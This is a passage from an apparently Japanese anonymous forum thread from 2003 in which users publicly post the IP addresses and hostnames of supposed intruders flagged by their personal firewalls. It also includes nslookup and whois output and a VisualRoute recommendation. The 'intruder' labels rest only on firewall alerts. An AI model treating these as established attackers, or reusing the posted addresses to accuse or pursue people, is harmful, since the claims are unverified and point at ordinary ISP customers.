さらしage、 侵入者, YahooBB219019208225.bbtec.net 侵入者Ip :219.19.208.225 侵入者, IMMfi-01p1-147.ppp11.odn.ad.jp 侵入者IP:61.116.70.147 侵入者, AS-93-208.dial-up.siol.net 侵入者IP:212.30.68.208 侵入者, AS-98-222.dial-up.siol.net 侵入者IP:212.30.94.222 侵入者, 61.98.26.138 侵入者IP: 61.98.26.138 侵入者, 218.62.26.173 侵入者IP: 218.62.26.173
962 :
名無しさん@お腹いっぱい。 :03/10/17 18:53
さらしage 侵入者, r25-ctiHS2.E.loxinfo.net.th 侵入者IP: 203.146.160.89 侵入者, 213.37.81.16 侵入者IP: 213.37.81.16
pool-64-222-151-202.man.east.verizon.net さっきから80, 1080, 8080を叩いてる・・・
61.204.106.54
965 :
名無しさん@お腹いっぱい。 :03/10/20 00:34
コンコンコンコンコン・・・
202.81.170.216 誰だ?love letterかましてきたヴォケは。
968 :
名無しさん@お腹いっぱい。 :03/10/21 02:28
969 :
名無しさん@お腹いっぱい。 :03/10/21 02:42
968の者です。 ネクスト・イット株式会社HP内の→ VisualRoute と言う上に書いてある文字をクリックしたら↓ ライブデモをクリック!→ VisualRouteを体験出来ます!。(一度自分で追跡してみて下さい) 俺はVisualRoute日本語版を日本橋の上新電機で\5100ー.(税抜き)で買いました。 ノートンのやつで気に入ってて 即購入! しましたぁー。(・3・)
またそのピーナから。uze- 210.23.172.9
971 :
名無しさん@お腹いっぱい。 :03/10/22 03:16
~~旦_(σ_σ)
972 :
217.225.59.122:3987 :03/10/22 10:42
217.225.59.122:3987
YahooBB219039218158.bbtec.net ウザ過ぎ
いまさらルーターはずしてPFWだけにするのは怖いw よってどこの誰それが叩いているやら・・・ 以前セットアップしてネットに繋いだ時、 いきなりPFWからグローバルIPの誰かさんと共有しますかと聞かれてビックらこいた。 あのIPのお方は今・・・・?w 何かの悪意があったのか、或いは初心者の平凡ミスだったのか? うーん・・・・
219.122.201.122
210.159.211.68
accsnet.ne.jp preference = 10, mail exchanger = ns.accsnet.ne.jp accsnet.ne.jp nameserver = ns.accsnet.ne.jp accsnet.ne.jp nameserver = ns-tk013.ocn.ad.jp ns.accsnet.ne.jp internet address = 210.235.48.67 ns-tk013.ocn.ad.jp internet address = 203.139.160.75
(社)コンピュータソフトウェア著作権協会
ttp://www.accsjp.or.jp/ 社団法人コンピュータソフトウェア著作権協会(ACCS)のホームページです。本協会はデジタル著作物の権利保護や著作権に関する 啓発・ 普及活動を通じて、コンピュータ社会における文化の発展に寄与する事を目的として設立された公益法人です。
ACCSnet - ホームページ
ttp://www.accsnet.ne.jp/ 加入案内>ACCSnetとは?
--------------------------------------------------------------------------------
ACCSは、1999年11月29日、郵政大臣から「第一種電気通信事業」の許可を受け、2000年4月1日からインターネット接続サービスを開始いたしました。
ACCSのCATVネットワークは、[600+R]方式という、わが国初の最新鋭のネットワークで、広帯域・高品質・双方向の特性を生かした、高速デジタルデータ伝送や50チャンネル放送を行うことが出来ます。
特に、インターネットは<高速・定額・便利>と三拍子そろったサービスを皆様にご提供することができます。
62.189.229.189
inetnum: 219.164.0.0 - 219.164.127.255
netname: PLALA
descr: Plala Networks Inc.
country: JP
admin-c: MN2905JP
tech-c: HS3694JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks: Japanese output, use the /e switch for English output)
changed:
[email protected] 20020419
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks: Japanese output, use the /e switch for English output)
changed:
[email protected] 20031015
source: JPNIC